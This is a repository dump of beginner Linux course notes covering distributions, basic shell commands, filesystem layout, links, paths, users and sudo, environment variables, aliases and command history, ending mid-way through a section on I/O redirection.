| - package managers 18 | - philosophy and goals of the distro developers 19 | - Other operating systems are similar to Linux (e.g. Mac OS) 20 | 21 | > 📌 Check the [Linux Distributions Timeline](https://upload.wikimedia.org/wikipedia/commons/1/1b/Linux_Distribution_Timeline.svg) for more in depth information. 22 | 23 | ![GNU/Linux Distributions Timeline | © Andreas Lundqvist, Donjan Rodic, Mohammed A. Mustafa | © Muhammad Herdiansyah, Fabio Loli](.gitbook/assets/image-20220724200352501.png) 24 | 25 | ### Popular Distributions 26 | 27 | - [**Debian**](https://www.debian.org/) - a Free Operating System. 28 | - [**Ubuntu**](https://ubuntu.com/) - Debian-based modern distro with updated free software for the widest audience and platforms. Ubuntu [Flavors](https://ubuntu.com/desktop/flavours) offer different desktop environments and specific intended use cases. 29 | - [**Linux Mint**](https://linuxmint.com/) - derivative of Ubuntu and Debian, "doing less to do better" and "works Out of The Box" philosophy. 30 | - [**Fedora**](https://getfedora.org/) - derivative of Red Hat Linux, for personal use, workstations, servers, IoT and plenty of "[spins](https://spins.fedoraproject.org/)" and "[labs](https://labs.fedoraproject.org/)", versions of Fedora with different software bundles. 31 | - [**Kali**](https://www.kali.org/) - Debian-based distro, geared towards various Information Security tasks (Penetration Testing, Security Research, Computer Forensics, Reverse Engineering). 32 | - [**ParrotOS**](https://www.parrotsec.org/) - Debian-based distro designed for Information & Cyber Security operations (Red Team and Blue Team), provides "Hacking tools at your fingertips". 33 | - [**Suse**](https://www.suse.com/) - one of the oldest Enterprise-quality Linux distributions, with a secure foundation for a broad range of datacenter and cloud environments and industries. 34 | - [**Arch Linux**](https://archlinux.org/) - a general purpose, lightweight and flexible distribution. 35 | 36 | > 📌 Check ready-to-use Linux guest operating systems from [**OSBoxes**](https://www.osboxes.org/) 37 | 38 | ------ 39 | 40 | -------------------------------------------------------------------------------- /linux-101/10-scripting/.gitbook/assets/password_strength.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/10-scripting/.gitbook/assets/password_strength.png -------------------------------------------------------------------------------- /linux-101/10-scripting/README.md: -------------------------------------------------------------------------------- 1 | # Bash Scripting 2 | 3 | ### Topics 4 | 5 | - Bash Scripting basics 6 | - Bash Scripting structures, loops and examples 7 | 8 | ### Sections 9 | 10 | 1. [Bash Scripting Basics, Control Structures, Loops](bash-script.md) 11 | 12 | -------------------------------------------------------------------------------- /linux-101/2-command-line/.gitbook/assets/image-20220828150837433.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/2-command-line/.gitbook/assets/image-20220828150837433.png -------------------------------------------------------------------------------- /linux-101/2-command-line/README.md: -------------------------------------------------------------------------------- 1 | # Command Line Basics 2 | 3 | ### Topics 4 | 5 | - What is the command line and getting help on it 6 | - How to use command line arguments and options 7 | - How to read text files 8 | 9 | ### Sections 10 | 11 | 1. [Intro to Command Line](intro-to-commandline.md) 12 | 1. [Getting help on the Command Line](getting-help.md) 13 | 1. [Command Line Arguments and Options](arguments-options.md) 14 | 1. [Reading Text Files](read-textfiles.md) 15 | -------------------------------------------------------------------------------- /linux-101/2-command-line/intro-to-commandline.md: -------------------------------------------------------------------------------- 1 | # Introduction to Command Line 2 | 3 | ## Command Prompt 4 | 5 | - First item in the prompt is a line representing the **user name**, followed by the "**`@`**" sign, the computer **host name**, a colon "**`:`**", the current working directory and the "**`$`**" sign. 6 | 7 | ```bash 8 | user@ubuntuVM:~$ 9 | # current_user @ host_name : current_working_directory $ 10 | # user = current_user 11 | # ubuntuVM = hostname 12 | # ~ = user's home directory 13 | # $ = logged in as a normal user 14 | 15 | root@ubuntuVM:/home/user# 16 | # # = logged in as the root user 17 | ``` 18 | 19 | ### whoami 20 | 21 | - **`whoami`** - Returns the user name of the current user 22 | 23 | ```bash 24 | user@ubuntuVM:~$ whoami 25 | user 26 | ``` 27 | 28 | - Note **Linux is case-sensitive**, so the commands are too. 29 | 30 | ### hostname 31 | 32 | - **`hostname`** - Returns the name of the current host 33 | 34 | ```bash 35 | user@ubuntuVM:~$ hostname 36 | ubuntuVM 37 | ``` 38 | 39 | ### pwd 40 | 41 | - **`pwd`** - Print working directory 42 | 43 | ```bash 44 | user@ubuntuVM:~$ pwd 45 | /home/user 46 | 47 | # ~ is shorthand for the home directory 48 | ``` 49 | 50 | ### ls 51 | 52 | - **`ls`** - List the contents of a directory 53 | 54 | ```bash 55 | user@ubuntuVM:~$ ls 56 | Desktop Documents Downloads Music Pictures Public snap Templates Videos 57 | ``` 58 | 59 | ### cd 60 | 61 | - **`cd`** - Change working directory 62 | 63 | ```bash 64 | user@ubuntuVM:~$ cd Downloads 65 | user@ubuntuVM:~/Downloads$ 66 | # the current working directory changed 67 | 68 | user@ubuntuVM:~/Downloads$ cd .. 69 | # to go back to the parrent directory 70 | user@ubuntuVM:~$ 71 | ``` 72 | 73 | > 📌 Use only **`cd`** to go back to the current user's home directory 74 | 75 | ```bash 76 | user@ubuntuVM:~$ cd /tmp/ 77 | user@ubuntuVM:/tmp$ cd 78 | user@ubuntuVM:~$ 79 | ``` 80 | 81 | ![](.gitbook/assets/image-20220828150837433.png) 82 | 83 | ### alias 84 | 85 | - **`alias`** - list bash aliases 86 | 87 | ```bash 88 | alias 89 | alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '\''s/^\s*[0-9]\+\s*//;s/[;&|]\s*alert$//'\'')"' 90 | alias egrep='egrep --color=auto' 91 | alias fgrep='fgrep --color=auto' 92 | alias grep='grep --color=auto' 93 | alias l='ls -CF' 94 | alias la='ls -A' 95 | alias ll='ls -alF' 96 | alias ls='ls --color=auto' 97 | ``` 98 | 99 | ------ 100 | 101 | -------------------------------------------------------------------------------- /linux-101/2-command-line/read-textfiles.md: -------------------------------------------------------------------------------- 1 | # Looking at Text Files 2 | 3 | ## Commands 4 | 5 | ### more 6 | 7 | - **`more`** - look at the content of a text file page by page, by only moving forward in a file. Press **`q`** to quit. 8 | 9 | ### less 10 | 11 | - **`less`** - look at the content of a text file, with more options than the `more` command, like line by line, up and down navigation, moving, searching, jumping. 12 | - Search is possible by using the slash - **`/word_to_search`** 13 | - Press **`q`** to quit. 14 | 15 | ```bash 16 | # Some "less" Commands and Actions 17 | Down arrow, Enter, e, or j - Move forward one line. 18 | Up arrow,y or k - Move backward one line. 19 | Space bar or f - Move Forward one page. 20 | b - Move Backward one page. 21 | /pattern - Search forward for matching patterns. 22 | ?pattern - Search backward for matching patterns. 23 | n - Repeat previous search. 24 | N - Repeat previous search in reverse direction. 25 | g - Go to the first line in the file. 26 | Ng - Go to the N-th line in the file. 27 | G - Go to the last line in the file. 28 | p - Go to the beginning of fthe ile. 29 | Np - Go to N percent into file. 30 | h - Display help. 31 | q - Exit less. 32 | ``` 33 | 34 | ### cat 35 | 36 | - **`cat`** - Concatenate or link the content of different files to standard output. 37 | - Useful when combined with redirection of the output. 38 | 39 | 40 | ```bash 41 | cat --help 42 | Usage: cat [OPTION]... [FILE]... 43 | Concatenate FILE(s) to standard output. 44 | With no FILE, or when FILE is -, read standard input. 45 | -A, --show-all equivalent to -vET 46 | -b, --number-nonblank number nonempty output lines, overrides -n 47 | -e equivalent to -vE 48 | -E, --show-ends display $ at end of each line 49 | -n, --number number all output lines 50 | -s, --squeeze-blank suppress repeated empty output lines 51 | -t equivalent to -vT 52 | -T, --show-tabs display TAB characters as ^I 53 | -u (ignored) 54 | -v, --show-nonprinting use ^ and M- notation, except for LFD and TAB 55 | --help display this help and exit 56 | --version output version information and exit 57 | Examples: 58 | cat f - g Output f's contents, then standard input, then g's contents. 59 | cat Copy standard input to standard output. 60 | 61 | # Send the content of more files to a new file 62 | cat file1.txt file2.txt file3.txt > combined.txt 63 | cat combined.txt 64 | ``` 65 | 66 | - Display file contents: 67 | 68 | ```bash 69 | cat /etc/os-release 70 | PRETTY_NAME="Ubuntu 22.04 LTS" 71 | NAME="Ubuntu" 72 | VERSION_ID="22.04" 73 | VERSION="22.04 LTS (Jammy Jellyfish)" 74 | VERSION_CODENAME=jammy 75 | ID=ubuntu 76 | ID_LIKE=debian 77 | HOME_URL="https://www.ubuntu.com/" 78 | SUPPORT_URL="https://help.ubuntu.com/" 79 | BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/" 80 | PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy" 81 | UBUNTU_CODENAME=jammy 82 | ``` 83 | 84 | ------ 85 | 86 | -------------------------------------------------------------------------------- /linux-101/3-filesystem/.gitbook/assets/fhs2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/3-filesystem/.gitbook/assets/fhs2.png -------------------------------------------------------------------------------- /linux-101/3-filesystem/.gitbook/assets/image-20220828172429787.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/3-filesystem/.gitbook/assets/image-20220828172429787.png -------------------------------------------------------------------------------- /linux-101/3-filesystem/.gitbook/assets/image-20220828172735170.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/3-filesystem/.gitbook/assets/image-20220828172735170.png -------------------------------------------------------------------------------- /linux-101/3-filesystem/.gitbook/assets/image-20220828173252814.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/3-filesystem/.gitbook/assets/image-20220828173252814.png -------------------------------------------------------------------------------- /linux-101/3-filesystem/README.md: -------------------------------------------------------------------------------- 1 | # Files and the Filesystem 2 | 3 | ### Topics 4 | 5 | - What is the Linux Filesystem 6 | - Working with paths and file naming 7 | - Filesystem links and searching 8 | 9 | ### Sections 10 | 11 | 1. [Filesystem Hierarchy Standard](fs-hierarchy.md) 12 | 1. [Devices, Partitions and Mounting](devices.md) 13 | 1. [Absolute and Relative Paths](paths.md) 14 | 1. [Files and Directories](files-dirs.md) 15 | 1. [Paths, Filenames and Text File](path-filenames.md) 16 | 1. [Filesystem Links](fs-links.md) 17 | 1. [Archiving and Searching Files](archive-files.md) 18 | 19 | -------------------------------------------------------------------------------- /linux-101/3-filesystem/files-dirs.md: -------------------------------------------------------------------------------- 1 | # Working with Files and Directories 2 | 3 | ## Commands 4 | 5 | ### touch 6 | 7 | - **`touch`** - updates the access and last modification times of each file to the current time. 8 | - If the specified file does not exist, the touch command will create it. 9 | - It is used more to create empty files than to update the file timestamp. 10 | 11 | ```bash 12 | ls -l notes.txt 13 | -rw-rw-r-- 1 user user 0 ago 28 18:36 notes.txt 14 | 15 | touch notes.txt 16 | ls -l notes.txt 17 | -rw-rw-r-- 1 user user 0 ago 28 18:38 notes.txt 18 | # Timestamp is updated to the current time 19 | ``` 20 | 21 | ### cp 22 | 23 | - **`cp`** - copy the source file to the destination file 24 | 25 | ```bash 26 | cp notes.txt notes-copy.txt 27 | ``` 28 | 29 | ### mv 30 | 31 | - **`mv`** - move file 32 | - used for renaming the file/directory in the same directory 33 | 34 | ```bash 35 | mv notes.txt ./Desktop 36 | ``` 37 | 38 | ### rm 39 | 40 | - **`rm`** - remove files or directories 41 | - deletes the file forever (does not put it in the recycle bin) 42 | - use various options to minimize accidents 43 | 44 | ```bash 45 | rm -i ./Desktop/notes.txt 46 | rm: remove regular empty file './Desktop/notes.txt'? y 47 | ``` 48 | 49 | ### mkdir 50 | 51 | - **`mkdir`** - create directories 52 | 53 | ```bash 54 | mkdir project 55 | # Creates project directory 56 | ``` 57 | 58 | ### rmdir 59 | 60 | - **`rmdir`** - remove empty directory 61 | 62 | ```bash 63 | rmdir project/ 64 | rmdir: failed to remove 'project/': Directory not empty 65 | 66 | # Use "rm" to delete a non-empty directory, recursively removing all the directory contents without confirmation: 67 | rm -rf project/ 68 | ``` 69 | 70 | ------ 71 | 72 | -------------------------------------------------------------------------------- /linux-101/3-filesystem/fs-hierarchy.md: -------------------------------------------------------------------------------- 1 | # Linux Filesystem Hierarchy Standard 2 | 3 | > 📌 [FHS - Filesystem Hierarchy Standard](https://refspecs.linuxfoundation.org/FHS_3.0/fhs/index.html) 4 | 5 | ![Filesystem Hierarchy Standard](.gitbook/assets/fhs2.png) 6 | 7 | - Most Linux distribution follow the **[Filesystem Hierarchy Standard](https://en.wikipedia.org/wiki/Filesystem_Hierarchy_Standard)** as a reference for the layout of the Unix system. 8 | 9 | ```bash 10 | # Show the standard with the command: 11 | man hier 12 | ``` 13 | 14 | - All files and directories appear under the primary hierarchy root and entire file system root directory **`/`**. 15 | 16 | **`/bin`** - stores important executable programs (binaries). 17 | 18 | **`/boot`** - boot loader files used to boot the system (kernel, initrd). 19 | 20 | **`/dev`** - device files for physical devices (mouse, hdds, standard in/out, standard error). 21 | 22 | **`/etc`** - local system-wide configuration files for programs. 23 | 24 | **`/home`** - personal directories of all users. 25 | 26 | **`/lib`** - essential shared libraries for binaries to run 27 | 28 | **`/media`** - mount point for removable media. 29 | 30 | **`/mnt`** - mount point for temporary file systems. 31 | 32 | **`/opt`** - additional software not found in the distribution repositories, custom utilities and packages, accessible to everyone. 33 | 34 | **`/proc`** - information about running processes, the kernel and system hardware. 35 | 36 | **`/root`** - home directory for the root user. 37 | 38 | **`/sbin`** - essential binaries available only to the root user. 39 | 40 | **`/tmp`** - temporary files used by the system, usually cleared on boot, not for important storage. 41 | 42 | **`/usr`** - contains important subdirectories, read-only data programs. 43 | 44 | **`/var`** - contains dynamic program data (logs, spool), troubleshooting log files. 45 | 46 | ------ 47 | 48 | -------------------------------------------------------------------------------- /linux-101/3-filesystem/fs-links.md: -------------------------------------------------------------------------------- 1 | # Hard and Soft Filesystem Links 2 | 3 | - Linux offer shortcut function through links. 4 | - A link is a reference or a pointer to a file or directory somewhere on the file system. 5 | - There are two types of links: **hard** and **soft** (symbolic) links. 6 | 7 | ### ln 8 | 9 | - **`ln`** - make links between files 10 | 11 | ```bash 12 | ln --help 13 | Usage: ln [OPTION]... [-T] TARGET LINK_NAME 14 | or: ln [OPTION]... TARGET 15 | or: ln [OPTION]... TARGET... DIRECTORY 16 | or: ln [OPTION]... -t DIRECTORY TARGET... 17 | In the 1st form, create a link to TARGET with the name LINK_NAME. 18 | In the 2nd form, create a link to TARGET in the current directory. 19 | In the 3rd and 4th forms, create links to each TARGET in DIRECTORY. 20 | Create hard links by default, symbolic links with --symbolic. 21 | By default, each destination (name of new link) should not already exist. 22 | When creating hard links, each TARGET must exist. Symbolic links 23 | can hold arbitrary text; if later resolved, a relative link is 24 | interpreted in relation to its parent directory. 25 | ``` 26 | 27 | - By default `ln` creates a Hard Link. 28 | 29 | ## Hard Link 30 | 31 | - A **hard link** points to the physical location of the file on storage. 32 | - If the original file is moved or deleted a hard link continues to work. The file will be completely deleted when there are no hard links to the file. 33 | - Hard links are older and less frequently uses. 34 | - Cannot create directory hard link. 35 | 36 | 37 | ```bash 38 | cat hello.txt 39 | Hello 40 | 41 | ln hello.txt hello-hard-link.txt 42 | 43 | ls hello* 44 | hello-hard-link.txt hello.txt 45 | 46 | # After editing the original hello.txt file, the change is visible in the hello-hard-link.txt file 47 | cat hello.txt 48 | Hello World!!! 49 | 50 | cat hello-hard-link.txt 51 | Hello World!!! 52 | 53 | # If original file is delete, the link file still exists with the same content 54 | rm hello.txt 55 | cat hello-hard-link.txt 56 | Hello World!!! 57 | 58 | # Recreate the original file 59 | ln hello-hard-link.txt hello.txt 60 | ``` 61 | 62 | ## Soft - Symbolic Link 63 | 64 | - A **symbolic link** references the file or directory on the file system, not on storage. 65 | - If the resource is moved or deleted from the file system, the symbolic link will not work. 66 | - Always use **absolute paths** for soft links targets. 67 | - Soft links can cross file systems. 68 | - Directory soft links can be created. 69 | - There are many internal system symbolic links. 70 | 71 | 72 | ```bash 73 | ln -s ./hello.txt hello-soft-link.txt 74 | 75 | ls -l hello* 76 | -rw-rw-r-- 2 user user 15 ago 28 19:50 hello-hard-link.txt 77 | lrwxrwxrwx 1 user user 11 ago 28 19:56 hello-soft-link.txt -> ./hello.txt 78 | -rw-rw-r-- 2 user user 15 ago 28 19:50 hello.txt 79 | 80 | # The soft link created references the original hello.txt file 81 | cat hello-soft-link.txt 82 | Hello World!!! 83 | 84 | # If original file is moved, the soft link won't work 85 | mv hello.txt hello-new.txt 86 | cat hello-soft-link.txt 87 | cat: hello-soft-link.txt: No such file or directory 88 | ``` 89 | 90 | ------ 91 | 92 | -------------------------------------------------------------------------------- /linux-101/3-filesystem/path-filenames.md: -------------------------------------------------------------------------------- 1 | # Paths and Filenames 2 | 3 | ## Spaces in filenames 4 | 5 | > 📌 Use **`TAB`** for auto-completion. 6 | 7 | ```bash 8 | ls 9 | 'file name.txt' 10 | # Single quotes are displayed to make sure "file name.txt" is one entry 11 | 12 | cat file name.txt 13 | cat: file: No such file or directory 14 | cat: name.txt: No such file or directory 15 | # Bash shell uses spaces between commands arguments 16 | ``` 17 | 18 | - Best pratice: do not use spaces in file names as word separators. 19 | - There are two ways to tell bash the space is part of the name: 20 | - Escape the name with a **`\`** (treat the space as part of the argument). 21 | - Place the entire name in double quotes (do not interpret any special character inside the quotes). 22 | 23 | ```bash 24 | cat file\ name.txt 25 | Hello Paths! 26 | # TAB on keyboard can also be used for auto completion. 27 | 28 | cat "file name.txt" 29 | Hello Paths! 30 | ``` 31 | 32 | ## File and Path Expansion 33 | 34 | - Directories and files in a path are separated by a slash **`/`**. 35 | - Everything in between separators is called a **segment**. 36 | - The most used wildcard is the asterisk **`*`**. 37 | 38 | ```bash 39 | ls file*.txt 40 | # List the current directory text files that start with the string "file" 41 | 42 | ls file?.txt 43 | # List the text files that start with the string "file" and have another character after that. 44 | # ? wildcard = any single character on the command line 45 | 46 | ls **/*.txt 47 | # Use ** to search accross multiple segments. ** matches zero or more characters accross multiple directories. 48 | ``` 49 | 50 | - **`[ ]`** indicate very specific character to match. 51 | 52 | ```bash 53 | ls file[123].txt 54 | ls file[1-3].txt 55 | ls file[a-zA-Z].txt 56 | 57 | # Only match files that start with the string "file" and another specific character after. 58 | ``` 59 | 60 | ## Text Files Commands 61 | 62 | ### head 63 | 64 | - **`head`** - by default print the first 10 lines of each file 65 | - Use **`-n`** option to specify the lines to display (or -NUMBER) 66 | 67 | ```bash 68 | head words.txt 69 | # One 70 | # Two 71 | # Three 72 | # Four 73 | # Five 74 | # Six 75 | # Seven 76 | # Eight 77 | # Nine 78 | # Ten 79 | 80 | head -n 3 words.txt 81 | # One 82 | # Two 83 | # Three 84 | 85 | head -15 words.txt 86 | # One 87 | # Two 88 | # Three 89 | # Four 90 | # Five 91 | # Six 92 | # Seven 93 | # Eight 94 | # Nine 95 | # Ten 96 | # 97 | # Alfa 98 | # Bravo 99 | # Charlie 100 | # Delta 101 | ``` 102 | 103 | ### tail 104 | 105 | - **`tail`** - by default print the last 10 lines of each file 106 | - Use **`-n`** option to specify the lines to display (or +NUMBER) 107 | 108 | ```bash 109 | tail words.txt 110 | # Delta 111 | # Echo 112 | # Foxtrot 113 | # Golf 114 | # Hotel 115 | # India 116 | # Juliett 117 | # Kilo 118 | # Lima 119 | # Mike 120 | 121 | tail -n 3 words.txt 122 | # Kilo 123 | # Lima 124 | # Mike 125 | 126 | tail -4 words.txt 127 | # Juliett 128 | # Kilo 129 | # Lima 130 | # Mike 131 | ``` 132 | 133 | - **tail** command can be used to monitor the end of a file (a log) for changes. 134 | 135 | ```bash 136 | tail --help 137 | -f, --follow[={name|descriptor}] 138 | output appended data as the file grows; 139 | an absent option argument means 'descriptor' 140 | 141 | tail -f /var/log/auth.log 142 | ``` 143 | 144 | ### diff 145 | 146 | - **`diff`** - compare files line by line and displays any differences 147 | 148 | ```bash 149 | diff words.txt words2.txt 150 | 151 | 2c2 152 | < Two 153 | --- 154 | > 155 | 4c4 156 | < Four 157 | --- 158 | > 159 | 6c6 160 | < Six 161 | --- 162 | > 163 | 8c8 164 | < Eight 165 | --- 166 | > 167 | 13c13 168 | < Bravo 169 | ``` 170 | 171 | ------ 172 | 173 | -------------------------------------------------------------------------------- /linux-101/3-filesystem/paths.md: -------------------------------------------------------------------------------- 1 | # Paths 2 | 3 | - A path identifies the location of a file or directory. 4 | 5 | ## Absolute Paths 6 | 7 | - An absolute path always starts **from the root directory** **`/`**. 8 | - It is valid from anywhere on the file system, use it when certain of the location. 9 | - Sometimes relative path can be longer than the absolute path, so an absolute path is prefered. 10 | 11 | ```bash 12 | ls /var/log/syslog 13 | # /var/log/syslog is an absolute path to the syslog file 14 | ``` 15 | 16 | ## Relative Paths 17 | 18 | - A relative path starts **from the current directory** to the resource. 19 | - Is generally shorter than an absolute path, used for similar local directory structures, for projects. 20 | 21 | ```bash 22 | cd /var 23 | ls log/syslog 24 | # log/syslog is a relative path 25 | 26 | ls ./log/syslog 27 | # Using "." it specifies the commands starts in the current working directory 28 | 29 | ls ../home/user/Documents/ 30 | # ".." is the parrent of the current working directory 31 | ``` 32 | 33 | ------ 34 | 35 | -------------------------------------------------------------------------------- /linux-101/4-users-groups/README.md: -------------------------------------------------------------------------------- 1 | # Users and Groups 2 | 3 | ### Topics 4 | 5 | - Using groups and users 6 | - Manage user credentials and permissions 7 | - Learn symbolic and octal change permissions mode 8 | 9 | ### Sections 10 | 11 | 1. [Working with Users and Groups](users-groups.md) 12 | 1. [File and Directory Permissions](permissions.md) 13 | 1. [Changing Users and Passwords](users-credentials.md) 14 | 15 | -------------------------------------------------------------------------------- /linux-101/4-users-groups/users-credentials.md: -------------------------------------------------------------------------------- 1 | # Changing Users and Passwords 2 | 3 | ## Commands 4 | 5 | - Some users are able to run commands as another user. 6 | 7 | ### sudo 8 | 9 | - Usually the **`sudo`** command is used to execute a command using root privileges. 10 | - Only elevate your privileges to *root* when needed. 11 | 12 | ```bash 13 | sudo cat /etc/passwd 14 | # Runs the cat command as root 15 | 16 | sudo -u user2 cat /home/user2/test.txt 17 | # Runs the cat command as "user2" user 18 | ``` 19 | 20 | ### su 21 | 22 | - **`su`** - change user 23 | 24 | ```bash 25 | su user2 26 | 27 | su --help 28 | Usage: 29 | su [options] [-] [ [...]] 30 | 31 | Change the effective user ID and group ID to that of . 32 | A mere - implies -l. If is not given, root is assumed. 33 | 34 | Options: 35 | -m, -p, --preserve-environment do not reset environment variables 36 | -w, --whitelist-environment don't reset specified variables 37 | 38 | -g, --group specify the primary group 39 | -G, --supp-group specify a supplemental group 40 | 41 | -, -l, --login make the shell a login shell 42 | -c, --command pass a single command to the shell with -c 43 | --session-command pass a single command to the shell with -c 44 | and do not create a new session 45 | -f, --fast pass -f to the shell (for csh or tcsh) 46 | -s, --shell run if /etc/shells allows it 47 | -P, --pty create a new pseudo-terminal 48 | 49 | -h, --help display this help 50 | -V, --version display version 51 | ``` 52 | 53 | ### passwd 54 | 55 | - **`passwd`** - change user password 56 | 57 | ```bash 58 | passwd 59 | # Change current user's password 60 | 61 | sudo passwd user2 62 | # Change another user's password using an elevated user 63 | ``` 64 | 65 | ------ 66 | 67 | -------------------------------------------------------------------------------- /linux-101/5-installing-sw/.gitbook/assets/image-20221009142845749.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/5-installing-sw/.gitbook/assets/image-20221009142845749.png -------------------------------------------------------------------------------- /linux-101/5-installing-sw/README.md: -------------------------------------------------------------------------------- 1 | # Installing Software 2 | 3 | ### Topics 4 | 5 | - Managing software 6 | - Install, uninstall, update packages 7 | - Manual install packages 8 | 9 | ### Sections 10 | 11 | 1. [Package Management](package-management.md) 12 | 13 | -------------------------------------------------------------------------------- /linux-101/6-shells/.gitbook/assets/image-20221010190521527.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/6-shells/.gitbook/assets/image-20221010190521527.png -------------------------------------------------------------------------------- /linux-101/6-shells/.gitbook/assets/image-20221010191004310.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/6-shells/.gitbook/assets/image-20221010191004310.png -------------------------------------------------------------------------------- /linux-101/6-shells/.gitbook/assets/image-20221010203032874.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/6-shells/.gitbook/assets/image-20221010203032874.png -------------------------------------------------------------------------------- /linux-101/6-shells/README.md: -------------------------------------------------------------------------------- 1 | # Shells 2 | 3 | ### Topics 4 | 5 | - Command line different shells 6 | - Variables and files 7 | - Redirection and command history 8 | 9 | ### Sections 10 | 11 | 1. [Common Command Line Shells](shells.md) 12 | 1. [Environment Variables & Startup Files](env-vars-files.md) 13 | 1. [Input/Output Redirection](io-redir.md) 14 | 1. [Command History & Substitution](history-sub.md) 15 | 16 | -------------------------------------------------------------------------------- /linux-101/6-shells/env-vars-files.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | # Environment Variables & Startup Files 4 | 5 | ## Environment Variables 6 | 7 | - The shell stores information in the environment variables. 8 | - Each shell has its own values for these variables. 9 | 10 | ### printenv 11 | 12 | ```bash 13 | printenv 14 | # Prints name and value pairs for all the environment variables 15 | # VARIABLE_NAME=VALUE 16 | 17 | printenv | grep PATH 18 | ``` 19 | 20 | ![](.gitbook/assets/image-20221010190521527.png) 21 | 22 | ![](.gitbook/assets/image-20221010191004310.png) 23 | 24 | - **`SHELL`** - user's shell is bash 25 | - **`PWD`** - current working directory 26 | - **`HOME`** - home directory for the current user 27 | - **`PATH`** - list of the directories searched in order, to find commands to be executed. 28 | - Current working directory can be put first in this path, easier to execute current working directory programs but can be used for attacks. 29 | 30 | There are two types of environment variables: **global** and **local**. 31 | 32 | ## Global 33 | 34 | - **Global** variables can be accessed by anything executed in that shell = `Environment Variables` 35 | 36 | ### export / unset 37 | 38 | ```bash 39 | # Create a global variable 40 | export COUNT_GLOBAL=33 41 | echo $COUNT_GLOBAL 42 | 33 43 | 44 | # Unset a variable 45 | unset COUNT_GLOBAL 46 | ``` 47 | 48 | ## Local 49 | 50 | - **Local** variables are valid only for the current shell (and not for sub-shells) = `Shell Variables` 51 | 52 | ```bash 53 | # Create a shell variable 54 | COUNT_LOCAL=42 55 | echo $COUNT_LOCAL 56 | 42 57 | # $ is used to tell the shell that it is a variable 58 | 59 | # Change shell (create sub-shell) and check the variable doesn't exist 60 | bash 61 | echo $COUNT_LOCAL 62 | ``` 63 | 64 | ## Startup files 65 | 66 | - When starting a new bash shell, the shell is configured using startup files. 67 | - Interactive non-login shell - the type of shell opened by the Terminal 68 | 69 | ```bash 70 | nano .bashrc 71 | # There are various configurations for the shell and commands aliases 72 | # Aliases can be added at the bottom of this file 73 | ``` 74 | 75 | - `alias name='COMMAND_VALUE'` - the alias uses the entire command enclosed in single quotes 76 | 77 | ![](.gitbook/assets/image-20221010203032874.png) 78 | 79 | - After adding an alias, a new shell must be created to make the alias work, or use the **`source .bashrc`** command in the same shell. 80 | 81 | ```bash 82 | source .bashrc 83 | # Re-runs all the commands in the .bashrc file in the current shell 84 | ``` 85 | 86 | - Using a shell other than bash, the startup file name will be different. 87 | 88 | ------ 89 | 90 | -------------------------------------------------------------------------------- /linux-101/6-shells/history-sub.md: -------------------------------------------------------------------------------- 1 | # Command History & Substitution 2 | 3 | ## Command History 4 | 5 | - To show previously executed commands use the `history` command 6 | 7 | ### history 8 | 9 | ```bash 10 | history 11 | 865 find / -name 'file1.txt' 2> errors.txt 12 | 866 cat errors.txt 13 | 867 ll 14 | 868 ls errors.txt 15 | 869 ll errors.txt 16 | 870 source .bashrc 17 | 871 ll errors.txt 18 | 872 ls -lah errors.txt 19 | # It includes the executed commands and the history number associated to them 20 | 21 | history | less 22 | 23 | # To execute one of the previous commands use !HISTORY_NUMBER 24 | !868 25 | 26 | # To execute the last command use these shortcuts 27 | !-1 28 | !! 29 | 30 | # Up & Down arrow keys can be used to scroll through history 31 | 32 | # To execute the last "command" command - cat for example 33 | !cat 34 | ``` 35 | 36 | - The configuration options of the history are located in the `.bashrc` file 37 | 38 | ```bash 39 | cat ~/.bashrc 40 | # for setting history length see HISTSIZE and HISTFILESIZE in bash(1) 41 | HISTSIZE=1000 42 | HISTFILESIZE=2000 43 | ``` 44 | 45 | ## Command Substitution 46 | 47 | - Redirecting doesn't always work. 48 | - With **command substitution** a command can be replaced with its output before the entire command is executed by the shell. 49 | - Backticks **``** or **$()** are used: 50 | 51 | ```bash 52 | ls -l `cat file.txt` 53 | ls -l $(cat file.txt) 54 | 55 | # Example with a file list 56 | cat file-list.txt 57 | file1.txt 58 | file2.txt 59 | file3.txt 60 | ls -l `cat file-list.txt` 61 | -rw-rw-r-- 1 root root 6 set 3 00:16 file1.txt 62 | -rw-rw-r-- 1 user user 7 set 3 00:16 file2.txt 63 | -rw-rw-r-- 1 user user 8 set 3 00:16 file3.txt 64 | ``` 65 | 66 | ------ 67 | 68 | -------------------------------------------------------------------------------- /linux-101/6-shells/io-redir.md: -------------------------------------------------------------------------------- 1 | # Input/Output Redirection 2 | 3 | > 📌 [Bash Redirection](https://linuxize.com/post/bash-redirect-stderr-stdout/) 4 | 5 | - In Bash (or other Linux shells), when a program is executed, it uses three standard Input/Output streams, each one represented by a numeric file descriptor: 6 | - **0** - `stdin` : the standard input stream (printed on the screen by default) 7 